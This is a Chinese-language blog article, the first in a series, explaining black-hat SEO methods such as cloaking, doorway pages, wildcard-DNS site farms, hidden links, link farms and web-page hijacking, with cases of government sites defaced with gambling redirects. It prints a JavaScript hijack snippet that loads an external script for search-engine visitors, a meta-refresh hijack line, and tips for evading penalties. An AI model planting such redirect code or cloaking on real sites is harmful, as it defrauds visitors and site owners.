黑帽SEO,黑帽SEO優化技術手法篇(一)

blank

黑帽SEO,黑帽SEO優化技術手法篇(一)

SEO全稱為搜尋引擎優化,是指通過站內優化、站外優化等方式,提升搜尋引擎收錄排名。 既然有SEO技術,便會有相應的從業人員,他們被稱為白帽SEO,專指通過公正SEO手法,説明提升網站排名的專業人員。

當然有白便會有黑,由於白帽SEO優化的過程將會十分漫長,一個新站想要獲取好的排名,往往需要花上幾年時間做優化推廣。 因此一些想要快速提升自身網站排名的小夥伴,便開始在SEO上研究作弊手法,從而誕生了黑帽SEO。 黑帽SEO是指通過作弊手段,讓網站快速提升排名的一類SEO技術,或者說是駭客技術,比如說:黑鏈(暗鏈)、站群、網站劫持、橋頁等,黑帽SEO能夠快速提升排名,但畢竟是違規作弊行為,容易被K。

此系統文章總共分為四篇,分別是手法篇、工具篇、隱藏篇、總結篇;本篇為黑帽SEO之手法篇,主要介紹黑帽seo的概念以及一些常用的手法。

插曲:有趣的是,就在前幾天有位朋友詢問了我關於黑帽SEO方面的問題,原因是他一位朋友運營的一個網站,頁面莫名其妙出現了賭博博彩的內容,刪除后又會自動生成,其十分苦難便尋求他幫忙。

SEO的一些黑色手法

黑帽SEO的手法很多,並且在不斷地更新換代,其中最常見的包括利用泛解析做站群,入侵高權重網站掛暗鏈,入侵高權重網站做網頁劫持,篡改高權重網站網頁內容,利用高權重網站二級目錄做推廣頁面,修改nginx配置做目錄反向代理等等。 接下來我結合實際案例,介紹一些常用的手段。

斗篷法(Cloaking)

為什麼叫斗篷法呢? 可是因為只能看到斗篷,而不能看到真面目的意思吧! 斗篷法指站長將一個網頁用兩個不同版本的頁面,一個版本給搜尋引擎看,一個版本給用戶流覽。 而搜尋引擎只能看到斗篷。

如果用戶訪問,那返回的可能是一個高大上的頁面,如果是搜尋引擎訪問,返回的可能是一個適合優化的頁面。 斗篷法基本用在灰色行業或是黑色行業中。 橋頁也叫:門頁、跳頁、過渡頁,通常是用軟體自動生成大量包含關鍵詞的網頁,然後從這些網頁做自動轉向到主頁。

目的是希望這些以不同關鍵詞為目標的橋頁在搜尋引擎中得到好的排名。 當用戶點擊搜尋結果的時候,會自動轉到主頁。 有的時候是在橋頁上放上一個通往主頁的連結,而不自動轉向。 大部分情況下,這些橋頁都是由軟體生成的。 你可以想像,生成的文字是雜亂無章,沒有什麼邏輯的。 如果是由人寫出來的真正包含關鍵詞的文章,就不是橋頁了。 所謂的橋頁也叫過渡頁,是指一個頁面打開之後會自動(或手動)轉向到別的頁面。 (注意:這種方法在baidu裡面可以使用,但不要用在google里! ),我們來看一個html格式的橋頁的全部代碼:

blankblank

這個頁面打開後會在0秒(由content="0定義時間)內轉向到目標網頁(由meta標籤中的url=">定義轉向的網站),所以大家只要稍加修改,就可以變成你自己的橋頁了。 我們為我們的所有商品都建立一個這樣的頁面,每一個頁面里都依次按照我們的商品設置不同的關鍵字,然後依次把這些頁面上傳到你的目錄,比如為上傳後的位址為:...... 那麼我們再依次把這些位址一一的提交給搜尋引擎,這樣,當搜尋引擎搜索到這些橋頁並被使用者打開后,會馬上轉入到你指定的主頁。 這樣的話你的這些產品被搜索到的機會是不是就大大提高了?

對於橋頁的建立,關鍵是還是關鍵字要選擇好,就拿上面那個手機網站的例子來說,我們要依次為每一個關鍵字都要做一個單獨的橋頁,關鍵字要盡量的全。 再有,一個關鍵字我們也完全可以做多個內容完全相同但名字一定要不相同的橋頁,並一一的提交給搜尋引擎來增加被搜索到的機率。 它針對搜尋引擎而作,通過根據特定的搜索詞製作一些頁面獲得較好的排名,引導用戶進入主站。 有的時候是根據搜尋引擎演算法製作頁面,迎合搜尋引擎演算法獲得好的排名。 但不管是那一種,它實際上都屬於一種seo作弊行為。

橋頁跳轉方式

1、自動跳轉,就像上面講的,利用自動跳轉代碼,直接跳轉到目標頁,優點:使用者不知道跳轉到了其他頁,比較信任。 缺點:容易被搜尋引擎發現。

2、手動跳轉,在橋頁上製作藍色顯眼鏈接,引導使用者。 優點:不容易被搜尋引擎發現,缺點:使用者信任度降低。

利用泛解析建立泛二級域名站群

利用DNS泛解析可以快速建立站群,因為一個一級域名便可以衍生出無數個二級域名,當然一般需要藉助站群工具,因為建立站群需要有很多內容不同的頁面,手工建立顯然不可能。 而seo人員大費周章地建立站群的目的,便是能夠快速吸引大量的搜尋引擎爬蟲,增加網站在搜尋引擎中的收錄量。 以下是某個泛二級域名站群案例截圖:

blankblank

需要說明的是,以上截圖中的二級域名並不是通過一條條dns解析記錄去綁定的,解析裡面設置的是*,也就是泛解析。 而伺服器端有程式或者代碼去控制當構造不同的二級域名訪問時,會返回不同的網頁內容,也就讓搜尋引擎誤認為每個二級功能變數名稱都是一個單獨的網站。

泛解析有很多優點,比如對使用者友好(即使輸錯二級域名也能跳轉到目標網站),又能夠更快速地被搜尋引擎收錄等。 基於這些優點,很多站長會選擇用此方式來增加網站收錄,然而如果沒有妥善的使用泛解析可能會帶來難以想像的危害。

利用泛解析做黑產

利用泛解析做黑帽seo的方式也有很多種,基於是否需要入侵網站以及dns伺服器,我分為入侵法與非入侵法來介紹。

入侵法

真實案例:幾個月前我們發現一個重要政府網站出現了大量博彩頁面,取證截圖如下:

blankblank

經過分析我發現,此手法利用的便是泛解析,從截圖中可以看到出現了大量此政府網站的二級甚至三級域名,而這些功能變數名稱都是隨機構造的,訪問後會跳轉到博彩色情等非法頁面,而訪問一級域名又是正常的內容。 且先不分析跳轉的過程中用到了哪些技術,單從泛解析記錄就不難看出,此網站被人篡改了dns解析記錄。 我們有理由相信,駭客獲取了此功能變數名稱的dns解析控制許可權,並將此功能變數名稱泛解析到駭客準備好的伺服器上。 那麼駭客這麼做的目的很明顯,為了讓搜尋引擎快速收錄二級或者三級域名,從而達到引流到非法頁面的目的。

我們通過分析此政府網站被入侵特徵推匯出此事件過程應該是,駭客通過入侵手段獲取到了該政府網站dns解析許可權(如何獲取暫不可知),然後通過添加泛解析記錄,將此記錄指向駭客準備好的伺服器,而此伺服器上有動態語言去實現通過不同二級域名訪問,返回不同的頁面結果功能。 由於政府網站本身權重很高,因此二級域名頁面被百度快速收錄,達到為非法頁面引流的目的。 這種手法的好處在於不必入侵網站,而只要獲取到功能變數名稱解析許可權即可(當然獲取功能變數名稱解析許可權也並非易事)。

非入侵法

真實案例:幾天前我們發現有一個網站(sdddzg.cn)利用泛解析做惡意推廣,查看網站特徵后,我們嘗試構造不同的二級域名訪問,取證截圖如下。 建構二級網域名稱存取:

blankblank

最終傳回結果:

blankblank

可以看到返回結果對網頁內容以及url做了處理,當我們嘗試構造不同的二級域名訪問,發現返回結果內容都不一樣,然而通過獲取ip發現來自同一台伺服器。 首先我們不難想到,此功能變數名稱一定是做了泛解析的,那麼它是如何控制網頁內容變化的呢? 查看網頁源碼可以看到jiang.gov.cn網頁源碼被嵌入到了目標網頁中。

blankblank

那麼其實想要實現此技術也並不難,可以在服務端上用代碼實現。 首先通過獲取請求的二級域名位址,然後去訪問該二級域名內容獲取源碼鑲嵌到自己的網頁內。 如果建構的二級功能變數名稱內容不是一個完整的功能變數名稱位址(如:1.sdddzg.cn),則隨機返回一段源碼。 這種手法的好處在於不必入侵網站,只需要自己搭建一台伺服器即可,但推廣效果沒有那麼好。

利用網站暗鏈

在網頁中植入暗鏈這種手法已經相對落伍了,目前用的也比較少,因為搜尋引擎已經能夠對此作弊手法進行檢測。 為了介紹知識的完整性,此處我簡單介紹一下。 暗鏈也稱為黑鏈,即隱蔽連結 hidden links,是黑帽SEO的作弊手法之一。 掛暗鏈的目的很簡單,增加網站外鏈,提高網站排名;實現方式主要分為幾種:利用CSS實現、利用JS實現、利用DIV+JS實現等。 具體介紹請參考:黑帽SEO之暗鏈

利用高權重網站,構造關鍵詞URL做推廣

真實案例:一年前當我剛研究黑帽SEO的時候發現了一個有趣的黑帽SEO方式,雖然手法比較拙劣老套,但卻也有成效。 於是在寫這篇文章的時候,我特意找了一個典型案例,與大家分享,取證截圖如下。

blankblank

將URL中的參數內容顯示到網頁內,這原本是某些網頁的一種特殊功能。 以往的經驗告訴我這種特性如果沒有處理好,可能會引發XSS漏洞,而今我不得不認識到,這種特性也一直被用於黑帽seo。 通過在url或者post數據包(常見於搜索框功能)中構造推廣關鍵詞,再將有推廣關鍵詞頁面添加到蜘蛛池中,使搜尋引擎收錄就能達到推廣的目的。 一般此種手法常被用來推廣qq號,盈利網站等(類似打廣告),而當我們通過搜尋引擎搜尋某些關鍵詞時(如色情資源),就會顯示出此頁面,從而達到推廣自身帳號或者網站的目的,當然這隻是一種推廣手段,並不太涉及引流。

利用網頁劫持引流

網頁劫持,又叫網站劫持或者搜尋引擎劫持,是目前黑帽SEO中最流行的一種做法。 其原因可以簡單概括為:易收錄、難發現,易收錄表現為搜尋引擎尚沒有很好的機制能夠檢測出此作弊手段,網頁劫持手法仍然能夠大量引流。 難發現是指網頁劫持手法比較隱蔽,一般非技術人員很難發現它的存在。

網頁劫持從手法上可以分為服務端劫持、用戶端劫持、百度快照劫持、百度搜索劫持等等;

網頁劫持的表現形式可以是劫持跳轉,也可以是劫持呈現的網頁內容(與直接篡改網頁內容不同),目前被廣泛應用於私服、博彩等暴利行業。

網頁劫持真實案例

blankblank

幾個月前我處理了一起網頁劫持案列,起因是某政府網站上出現了博彩相關內容(排除新聞頁面),這顯然是不合規的。 排除管理員失誤添加導致,恐怕此網站多半是被駭客入侵了。 首先我訪問了該記錄上的連結,緊接著流覽器中出現了一個正常的政府頁面,而也就須臾之間,網頁瞬間又跳轉到了博彩網頁。 圖一為正常政府頁面:

blankblank

圖二為博彩頁面:

blankblank

可以看到博彩頁面的域名為 0980828.com,顯然不是先前的政府網站域名xxxx.gov.cn。 看到此現象,再結合多年安全經驗,我大致能夠猜測此網站應該是被網頁劫持了。 通過分析以上過程的數據包,不難發現在該網站前端頁面被嵌入了一段非法代碼。

blankblank

此代碼存放在43.250.75.61伺服器上,查看該伺服器訊息,發現其在日本。

blankblank

而透過存取此段代碼,傳回內容則是跳轉到 0980828.com 網站上。

blankblank

分析至此,我們不難發現,導致頁面跳轉的原因便是xxxx.gov.cn網頁被非法嵌入了一竄代碼,而此代碼能夠控制訪問該網頁時跳轉到博彩頁面。 這是搜尋引擎劫持最為基礎且常見的一種方式,其變種甚多,類型方式也各異。 最後我通過登錄web伺服器查看,發現了存在大量html檔被篡改,且都在檔開頭被寫入外部js引用。 那麼此入侵事件過程應該是,駭客通過web應用程式某些漏洞入侵伺服器(實際是管理後台弱口令+任意檔上傳),通過批量篡改伺服器靜態文件實現網頁劫持的目的。 網頁劫持的手法非常多,並不是這一個案例就能概括的,更多詳細情況請繼續看下文介紹。

服務端劫持

服務端劫持也稱為全域劫持,此手法為修改網站動態語言檔,判斷訪問來源控制返回內容,從而達到網頁劫持的目的。 其特點往往是通過修改asp/aspx/php等後綴名檔,達到動態呈現網頁內容的效果。

Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執行一個動態腳本的時候,都會先載入該腳本,然後再執行目標腳本。 所以只要在 Global.asa 中寫判斷使用者系統訊息的代碼(訪問來源等),如果是蜘蛛訪問則返回關鍵詞網頁(想要推廣的網站),如果是使用者訪問則返回正常頁面。

用戶端劫持

用戶端劫持的手法也很多,但最常用的就兩種:js劫持與Header劫持。 js劫持目的是通過向目標網頁植入惡意js代碼,控制網站跳轉、隱藏頁面內容、視窗劫持等。 js植入手法是可以通過入侵伺服器,直接寫入原始程式碼中;也可以寫在資料庫中,因為有些頁面會呈現資料庫內容。 js劫持代碼案例:以下代碼可以使通過搜尋引擎搜索的並點擊頁面時,執行一段js並跳轉到博彩頁面;而直接輸入網址訪問網頁時,跳轉到一個404頁面。

today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');
}
else
{
window.location.href="../../404.htm";
}

代碼分析:通過referer判斷來路,如果referer來路為空就是跳轉到404頁面,如果是搜尋引擎來的referer裡面也會有顯示,然後在寫代碼控制跳轉。 如果只是控制實現顯示不同的內容,可以修改php、asp代碼;如果需要劫持搜尋引擎搜尋框,可以寫JS代碼來做瀏覽器本地跳轉。 當然js功能可以無限擴展,比如可以控制一個ip一天內第一次訪問正常,其餘訪問跳轉等等。 header劫持,就是在html代碼的head中添加特殊標籤,代碼如下:

<meta http-equiv="refresh" content="10; url=http://thief.one">

header劫持利用的就是Meta Refresh Tag(自動轉向)功能將流量引走。

直接篡改網頁內容(比較低級)

有些駭客在入侵網站后,喜歡直接篡改網頁內容,比如放上自己的qq號,或者作為推廣將網頁篡改成非法頁面。 在此我對此做法的駭客表示鄙視,因為這是一種最惡劣最低級的手法。 惡劣在於直接篡改網頁內容,可能會導致網站無法挽回的損失;低級在於此手法極易被發現,起不到真正的引流推廣作用。

連結農場

鏈接養殖場通常來者不拒,而且這些被搜集的網站通常是互不相關的。 鏈接農場是一種被搜尋引擎禁止的作弊方式,在正規的SEO中不論製作或者介入連結工廠,都會受到懲罰。

舉例說明:某站長建立幾十個甚至上百個簡單的網站(很垃圾的網站),只做幾個關鍵詞(如:seo論壇,seo優化,seo基礎),網站沒有任何的可用訊息和有效訊息,只是通過互相建立友情連結,就能馬上可以短期內排到百度搜索的首頁,提高網站的權重,從而霸佔市場,短期內獲得高額利潤。 這個技術叫做linkfarm,屬於黑帽技術,這些快速上升的網站也屬於鏈接養殖場,短期內欺騙百度蜘蛛,當百度蜘蛛知悉後,網站基本也就被k了!

特點

1.鏈接農場中存在成百上千的Incoming/Inbound Links(導入連結),而且在死亡之前會不斷增加。

2.鏈接農場是雙向連結。 外部鏈接連結到農場網站,農場網站鏈接到外部網站。

3.被鏈接農場鏈接的網站雜亂無章,沒有類目和權重的要求

4.被連結農場鏈接的網站在Google搜索時,會在類似結果中出現亂七八糟的不相關網址。

5.鏈接農場有自助或手動的添加連結方式。

危害

(1)鏈接農場中的鏈接在權重計算中不予考慮。

(2)鏈接農場鏈接頁面中的權重被降低。

(3)鏈接農場中鏈接頁面本身的重要性被降低。

(4)鏈接農場中的頁面匯出連結重要性被降低。

(5)鏈接農場中鏈接頁面關鍵詞對用戶來說毫無意義,被搜尋引擎認為作弊。 鏈接養殖場(Link Farm)與網址導航區別編輯網址導航一般不會要求與你交換連結,即不會要求你網站有他們的連結;而鏈接養殖場是雙向連結,因此如果鏈接養殖場網站或網頁單方面指向你的網站,則對你並沒有任何影響。

運用

1、現在的站群,包括黑豹站群或是市面上主流的站群,都在利用鏈接農場。 2、自己養一批站,然後導入連結注意一些基本OK

3、大多數的鏈接工廠,一般都是同類型網站、同IP網站相互之間的連結,或是IP的C段相同,這樣很容易被K,思路來了,比如做100個站,可以同時租幾個機器,IP段不同,然後10個站一個IP,這樣,相互再換連結,被K的機率就小很多。

4、同類型、不同IP之間,應該沒事,比如都是地方新聞網。

利用高權重網站二級目錄

即駭客入侵網站后,在網站二級目錄下創建很多自己做推廣的頁面。 為了達到引流的目的駭客往往需要建立大量的二級目錄頁面,因此需要用到寄生蟲程序來自動化的創建頁面。 此手法也需要入侵高權重網站,獲取網站伺服器許可權。 與網頁劫持手法不同的是,此手法側重點在於利用高權重網站自身的優勢,在其目錄下創建多個推廣頁面;而網頁劫持側重隱藏自身,其可以做到動態呈現網頁內容給客戶。 因此在實際使用中,駭客經常結合兩者使用。 此手法與利用泛解析做黑帽seo的手法還是有明顯差異的,雖然同樣是利用高權重網站本身的優勢,但泛解析利用的是二級域名,而此手法利用的是二級目錄,當然兩者有異曲同工之妙。

利用高權重網站二級目錄手法的案例與泛解析案例類似,這裡不再詳述。 既然我前面提到此手法往往需要寄生蟲程式的配合使用,那麼何為寄生蟲程式? 它又有何玄機? 下篇將會詳細介紹,敬請期待。

雖然黑帽SEO並不違法,但它確實違反了搜尋引擎設定的網站管理員指南。 換句話說,它仍然違反規則。 這意味著如果你參與黑帽SEO,你必須願意受到一個討厭的懲罰作為懲罰。 從搜尋引擎獲得懲罰將導致您的網站在搜尋結果中下降或更糟糕,它可能會被完全刪除。 這意味著您的網站將獲得更少的流量,並最終減少客戶。

灰色的帽子SEO模糊線

你不會找到灰色帽子SEO,但你會發現它在黑色和白色帽子SEO的中間。 如果有SEO策略,你很難將其歸類為黑帽或白帽SEO,那麼它可能是一種灰帽子技術。

什麼是灰帽SEO?

灰色帽子搜尋引擎優化包含略帶陰影的SEO策略。 雖然他們並不反對搜尋引擎禁止的做法,但他們有點不道德。

灰色的帽子SEO線程接近黑帽SEO的線。 灰帽SEO技術通常不會被列為網站站長指南中的禁止做法,但它們有點可疑。 隨著時間的推移,許多灰帽SEO的做法已經成為黑帽SEO的做法

其實當在寫這篇文章前,我思索著盡量能夠全面地介紹黑帽SEO知識以及手法。 當開始寫這篇文章的時候,我便有點無從下手,因為涉及知識面太廣,手法又非常豐富,而當我寫完這篇文章的時候,我覺得這一切才剛剛開始。

希望本文對你有所説明

What do you think?

Written by marketer

blank

將您的網站移動到中心點 CMS:期望 v 現實

blank

為什麼企業要從銷售團隊轉移到中心點 CRM